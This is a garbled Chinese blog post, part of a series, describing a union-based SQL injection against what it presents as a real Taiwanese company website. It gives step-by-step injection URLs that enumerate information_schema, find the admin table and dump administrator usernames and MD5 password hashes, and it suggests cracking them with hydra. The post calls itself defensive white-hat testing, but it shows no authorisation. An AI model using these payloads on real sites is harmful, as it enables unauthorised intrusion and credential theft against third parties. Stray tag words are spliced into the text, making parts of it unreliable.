Web滲/透/測試實戰(2)—獲取網站後臺登陸用戶名密碼
接上一篇內容:
php
滲/透/測/試實戰(1)—成功滲/透臺灣某淨化設備公司官網html
目錄
mysql
寫在前面sql
信息彙總安全
漏洞彙總:
ide
數據庫信息:工具
一、 數據庫分析網站
寫在前面
做爲一個防護型白帽黑/客
你必定要知道黑/客的進攻套路
纔能有相應的防護措施
聲明:只作測試,發現對方的漏洞,並不進行破壞性操做
信息彙總
漏洞彙總:
一、存在SQL注入漏洞二、SQL注入查詢長度爲9個字段,即 union select 1,2,3,4,5,6,7,8,9三、網站無錯誤回顯,SQL執行錯誤顯示空白頁面
數據庫信息:
一、數據庫版本:mysql 5.7.3十二、當前數據庫:jiuyu_jiuyu三、當前登陸用戶:jiuyu@localhost四、注入點: http://www.xxx.com.tw/page.php?id=133 union select 1,2,version(),current_user(),5,6,7,8,9
利用information_schema庫:
在mysql數據庫中
當前登陸用戶下,會有一個information_schema數據庫
這個數據庫裏包含了當前用戶權限下
全部database、table、column、privilege等等的彙總信息
在注入過程當中,能夠充分利用。
而後咱們根據當前得到的信息,進行進一步的***
一、 數據庫分析
①獲取該用戶權限下,有多少個數據庫
#拼接注入鏈接http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,count(distinct(table_schema)),4,5,6,7,8,9 FROM information_schema.tables#經過information_schema數據庫獲取數據庫相關信息
經過注入SQL語句
獲得了數據庫的數量 2 個
②下一步獲取這兩個數據庫的名字
#經過使用limit 能夠逐條返回表數據http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,table_schema,4,5,6,7,8,9 FROM information_schema.tableslimit 2
經過添加兩個limit,限定兩條返回值
獲得了僅有的兩個數據庫名稱
information_schema 和 jiuyu_jiuyu
information_schema是默認的信息彙總表
全部,有用的就是jiuyu_jiuyu這個庫
二、表結構分析
獲得了目標數據庫:jiuyu_jiuyu
下面對該數據庫進行分析
①獲取數據庫多少表
http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,count(distinct(table_name)),4,5,6,7,8,9 FROM information_schema.tableswhere table_schema='jiuyu_jiuyu'#返回值爲 4個表
②獲取表名稱
#只有4個表,使用limit 逐條獲取表名http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,table_name,4,5,6,7,8,9 FROM information_schema.tableswhere table_schema='jiuyu_jiuyu'limit 1
依次獲得四個表
adminsmallclasswenzhangneirong
emmm 通過認真分析
不難發現
admin表會有一些重要信息
其餘的wenzhang、neirong之類的應該是一些新聞信息
下面 咱們就對admin表進行數據獲取
三、用戶名密碼獲取
首先,咱們要先拿到admin表的表結構,即包含的字段名
#獲取admin表的字段數量http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,count(1),4,5,6,7,8,9 FROM information_schema.columnswhere table_name='admin'#包含四個字段
獲取4個字段的名稱
#獲取admin表字段名稱http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,column_name,4,5,6,7,8,9 FROM information_schema.columnswhere table_name='admin' limit 1
經過limit 逐條獲取admin表的字段值 id username password quanxian
獲取登陸名/密碼
是否是有點緊張
用戶名密碼什麼的
#獲取admin表的數據值http://www.xxx.com.tw/page.php?id=133 unionselect 1,2,username,password,5,6,7,8,9 FROM jiuyu_jiuyu.admin
成功獲取用戶名密碼返回值。
固然,密碼是md5加密過的
若是想破解出明文
能夠使用以前介紹過的密碼爆破工具hydra進行爆破
Kali***測試工具庫(三)hydra——密碼暴力破解工具
好了,點到爲止
只作安全測試
發現漏洞
不要作違法亂紀的事情哦。
相關文章
- 1. web登陸用戶名密碼加密
- 2. 網站滲透測試安全檢測登陸認證分析
- 3. 實驗吧 web滲透至後臺登陸
- 4. 後臺實戰——用戶登陸之JWT
- 5. 2.100個滲透測試實戰#2(mrRobot)
- 6. 使用Wireshark抓取用戶在網站的登陸密碼
- 7. 訪問IIS7網站時提示要用戶名密碼登陸
- 8. kali滲透實戰4---HTTPS賬號密碼獲取
- 9. kali滲透實戰3---HTTP賬號密碼獲取
- 10. Vue 獲取登陸用戶名
- 更多相關文章...
- • 網站 域名 - 網站主機教程
- • PHP image_type_to_extension - 獲取圖片後綴 - PHP參考手冊
- • Java Agent入門實戰(二)-Instrumentation源碼概述
- • Java Agent入門實戰(一)-Instrumentation介紹與使用
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 安裝cuda+cuDNN
- 2. GitHub的使用說明
- 3. phpDocumentor使用教程【安裝PHPDocumentor】
- 4. yarn run build報錯Component is not found in path 「npm/taro-ui/dist/weapp/components/rate/index「
- 5. 精講Haproxy搭建Web集羣
- 6. 安全測試基礎之MySQL
- 7. C/C++編程筆記:C語言中的複雜聲明分析,用實例帶你完全讀懂
- 8. Python3教程(1)----搭建Python環境
- 9. 李宏毅機器學習課程筆記2:Classification、Logistic Regression、Brief Introduction of Deep Learning
- 10. 阿里雲ECS配置速記
歡迎關注本站公眾號,獲取更多信息
